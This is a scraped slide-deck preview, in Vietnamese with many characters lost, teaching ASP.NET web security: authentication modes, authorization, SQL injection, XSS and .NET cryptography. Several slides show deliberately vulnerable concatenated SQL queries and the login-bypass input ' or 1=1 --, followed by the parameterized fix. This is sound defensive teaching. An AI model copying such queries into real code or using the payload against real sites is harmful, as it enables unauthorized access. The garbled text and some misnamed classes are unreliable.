View
219
Download
0
Category
Preview:
Citation preview
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
1/55
Bo mt trong ASP.NET
23 January 2003
Lng V Minh
Source: ASP.NET: .NET Security Guidance Architecture Guide
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
2/55
Ni dung
Vn bo mt trong ng dng Web Web.config
Vn chng thc quyn truy cp
Vn chng thc quyn s dng
Cc bc thc hin kim tra bo mt
Mt s kiu tn cng
Th vin bo mt ca .NET
2
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
3/55
VN BO MT TRONG WEB
3
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
4/55
Cc vn lin quan n bo mt ng dng Web
Bo mt da trn phn cng
Bo mt da trn cng truy cp (Firewall, DoS)
Bo mt da trn giao thc an ton (SSL, TSL, HTTPS)
Bo mt trn Webserver IIS
Bo mt trn tng ng dng ASP.NET
Bo mt CSDL SQL
Bo mt cp H iu hnh
4
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
5/55
Tp tin cu hnh Web.config
Mt phn cu hnh v bo mt:
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
6/55
CHNG THC QUYN TRUY CP
Authentication
6
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
7/55
Tp tin cu hnh Web.config
Mt phn cu hnh v bo mt:
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
8/55
Tp tin cu hnh Web.config
iu khin tt c vn bo mt trong Website
Mi Website c duy nht mt Webconfig th mc gc
Tuy nhin, c th c thm cc file khc trong th mc con
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
9/55
Vn chng thc ngi dng (Authentication)
Tr li cho cu hi: Who you are ?
Cc c ch chng thc ngi dng trong ASP.NET
Windows Based
Form Based
Passport None
9
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
10/55
Authentication Windows Based
Ph hp cho h thng Web cc b (intranet)
Khng cn thng bo xc thc Phi s dng ti khon Windows Domain
Phi kch hot Cookie trnh duyt
Bao gm cc c ch:
Basic Authentication (Base64 encoded password)
Digest Authentication (Encrypted password - IE)
Integrated Authentication (kerberos)
10
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
11/55
Authentication Form Based
Thng s dng cho cc website Thng mi
C giao din ng nhp h thng Ph hp vi vic phn quyn khc nhau
C th khng cn phi s dng Cookies (Cookies-less)
11
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
12/55
Authentication Form Based
12
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
13/55
Mt s vn lin quan n Cookie-less
SessionIDc truyn trn Query String
Web.Config
Session ko di trong 20 pht (mc nh) k t thao tccui cng ca ngi dng
Tn cng da trn Session
public terminal
Sniffer
13
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
14/55
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
15/55
AuthenticationNone
S dng quyn truy cn Anonymous n Webserver
Qun l bo mt thng qua ISAPI
S dng ti khon IUSER_machinename ca Windows
15
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
16/55
CHNG THC QUYN S DNG
Authorization
16
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
17/55
Tp tin cu hnh Web.config
Mt phn cu hnh v bo mt:
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
18/55
Vn chng thc quyn s dng (Authorization)
Tr li cho cu hi: What they can see and do?
Xc thc quyn truy cp th mc, tp tin ca ngi dng
C ch h tr ca ASP.NET
Membership
Role-based Security
18
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
19/55
Vn chng thc quyn s dng (Authorization)
Tr li cho cu hi: What they can see and do?
Xc thc quyn truy cp th mc, tp tin ca ngi dng
C ch h tr ca ASP.NET
Membership
Role-based Security
Verb-based : GET, POST, HEAD (da vo giao thc HTTP)
Anonymous users (? Users)
Authenticated users (* Users)
19
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
20/55
Vn chng thc quyn s dng (Authorization)
? = Anonymous users
* = Everyone
20
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
21/55
Bo mt cho trang web
Thm th vo web.config
21
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
22/55
Bo mt cho th mc web
To mt file Web.config mi cho th mc cn bo mt
Ch cn cha thng tin sau:
22
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
23/55
CC BC THC HIN
23
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
24/55
Bc 1 - Authentication = Window
To v cp nht Web.config
To ti khon v nhm ti H iu hnh Windows Bt u s dng
24
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
25/55
Bc 1 - Authentication = Form
To v cp nht Web.config
To 1 trang web login
Chn ni lu tr ti khon ngi dng
Web.config
Tp tin XML, Text CSDL
Webservice
25
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
26/55
Bc 1 - Authentication = Form
Mt login form bao gm:
Textbox: username
Textbox: password
Checkbox: Remember me (optional)
Button: Login
Vn i vi mt khu:
Chiu di ti thiu, phn bit Hoa Thng, k t l
Dictionary Attack
M ha mt khu (Hash function)
26
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
27/55
Bc 1 - Authentication = Form
Mt s hm lin quan:
FormsAuthentication.Authenticate(
string username,
stringpassword);
FormsAuthentication.RedirectFromLoginPage(
string AuthName,
bool Persistent);
Response.Redirect(string Url);
27
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
28/55
28
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
29/55
Bc 2
Ly thng tin nh danh ngi dng
User Identity
Ly thng tin xc thc quyn s dng
IsInRole (Windows mode only)
Personalization
Lu tr cc thng tin cn thit trong Session
Namespace: System.Web.Security
29
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
30/55
Bc 2
Sau khi xc thc ngi dng thnh cng, mt ngi dng cth l mt trong cc kiu sau:
GenericIdentity
AuthenticationType, Name, IsAuthenticated
FormsIdentity
AuthenticationType, Name, IsAuthenticated
Ticket
PassportIdentity
AuthenticationType, Name, IsAuthenticated
HasTicket, TicketAge, Item, TimeSinceSignIn
WindowsIdentity
AuthenticationType, Name, IsAuthenticated
IsAnonymous, IsGuest, IsSystem, Token, Impersonate
30
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
31/55
Mt s hm lin quan
Using System.Web.Security;
String User.Identity.Name;
Bool User.Identity.IsAuthenticated;
Bool User.IsInRole(string role);
FormsAuthentication.SignOut();
31
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
32/55
MT S KIU TN CNG
32
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
33/55
Tn cng SQL Injection
Da vo cch thc hot ng ca Webpage
S dng ngun d liu nhp vo t:
Textbox
QueryString
S dng k thut chn cc m c sql vo lnh SQL
Chc nng tm kim
Chc nng phn trang
Chc nng xc thc ngi dng
33
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
34/55
Tn cng SQL Injection
34
string sql = "select * from KB where
content like '" + search.Text + "'
string sql = "select * from KB where
content like '%'
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
35/55
Tn cng SQL Injection
35
string sql = "select * from Users where
user ='" + User.Text + "'
and pwd='" + Password.Text + "'"
string sql = "select * from Users where
user =' ' or 1=1 --' and pwd=''"
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
36/55
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
37/55
Tn cng SQL Injection
Gii php:
Khng s dng quyn sa Chui kt ni (connection string) : lu c m ha
S dng Store-procedured thc hin truy vn d liu
S dng tham s (i tng Parameter) trong lnh SQL
37
sql = "select * from Users where
user = @user and pwd = @pwd";
SqlCommand cmd = new SqlCommand(sql,con);
cmd.Parameters.Add("@user",User.Text);cmd.Parameters.Add("@pwd",Password.Text);
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
38/55
Tn cng Cross site-scripting
Li dng vic hin th d liu t Database (c ngi
dng nhp vo) Chn m c HTML / Javascript vo ni dung d liu
Gii php: S dng Validation controls
S dng regexp
Kim tra chiu di d liu nhp vo
S dng Server.HtmlEncode/Server.HtmlDecode
38
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
39/55
Tn cng HTTP Harvesting
Khai thc d liu lu tr trn Database d vo :
Textbox, Querystring, Cookie
S dng cc lnh SQL
S dng tham s phn trang
Detail.aspx?id=1
Gii php:
M ha QueryString S dng System.Drawing
Theo di qu trnh khai thc web ca ngi dng
Thu i tc
39
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
40/55
TH VIN BO MT CA .NET
System.Security.Cryptogaphy
40
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
41/55
Th vin bo mt trong .NET
M ha (Encryption)
Nghi thc SSL (Secure Sockets Layer)
Ch k in t
41
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
42/55
M ha
M ha Encryption
Chuyn d liu sang dng th hin khc
Thut ton
Kha
C 3 k thut
Hash M ha khng i xng (public key)
M ha i xng (secret key)
42
M h H h
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
43/55
M ha - Hash
S dng thut ton Hash a ra mt con s t mtthng ip c di bt k
Xung t gi tr bm rt him xy ra
Khng s dng kha
Chui c m ha khng th gii m thnh chui ban u
Thut ton MD5, SHA-1, SHA256, SHA512,
43
M h H h
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
44/55
M ha Hash
MD5CryptoServiceProvider
SHA1CryptoServiceProvider, SHA1Managed
SHA356CryptoServiceProvider, SHA356Managed
SHA512CryptoServiceProvider, SHA512Managed
44
M h i
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
45/55
M ha i xng
M ha ch s dng 1 loi kha
Secret keym ha v gii m thng ip
Thut ton 3DES, Rijndael (AES), blowfish, idea,
45
M h i
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
46/55
M ha i xng
AesCryptoServiceProvider
AesManaged
DESCryptoServiceProvider
RC2CryptoServiceProvider
RijndaelManaged
TripleDESCryptoServiceProvider
46
M h bt i
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
47/55
M ha bt i xng
M ha da vo 2 loi kha
Public keym ha thng ip Private keygii m thng ip
Thut ton RSA, DSA,
47
M h bt i
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
48/55
M ha bt i xng
Cc lp i tng
DSACryptoServiceProvider RSACryptoServiceProvider
ECDiffieHellmanCng
ECDsaCng
48
N hi th SSL
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
49/55
Nghi thc SSL
SSL Socket Secure
Layer Nghi thc bo mt kt
ni gia client vserver
49
N hi th SSL
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
50/55
Nghi thc SSL
50
SSL Socket Secure
Layer Nghi thc bo mt kt
ni gia client vserver
Ch k i t
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
51/55
Ch k in t
51
Ch k in t
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
52/55
Ch k in t
52
Tip bo mt
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
53/55
Tip bo mt
Khng tin tng iu g100 %
c lng ri ro
Ri ro b tn cng
Hu qu
Hun luyn nhn vin
Architects, Developer, User,Administrator
Xem xt li:
M ngun, GUI
Microsoft BaselineSecurity Analyzer 1.2
Scan network or local
Scan installed updates
Scan well-knownissues
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
54/55
54
http://www.securitystats.com/tools/password.php
8/2/2019 Ptuddb2-04-Bao Mat Trong ASP.net
55/55
Recommended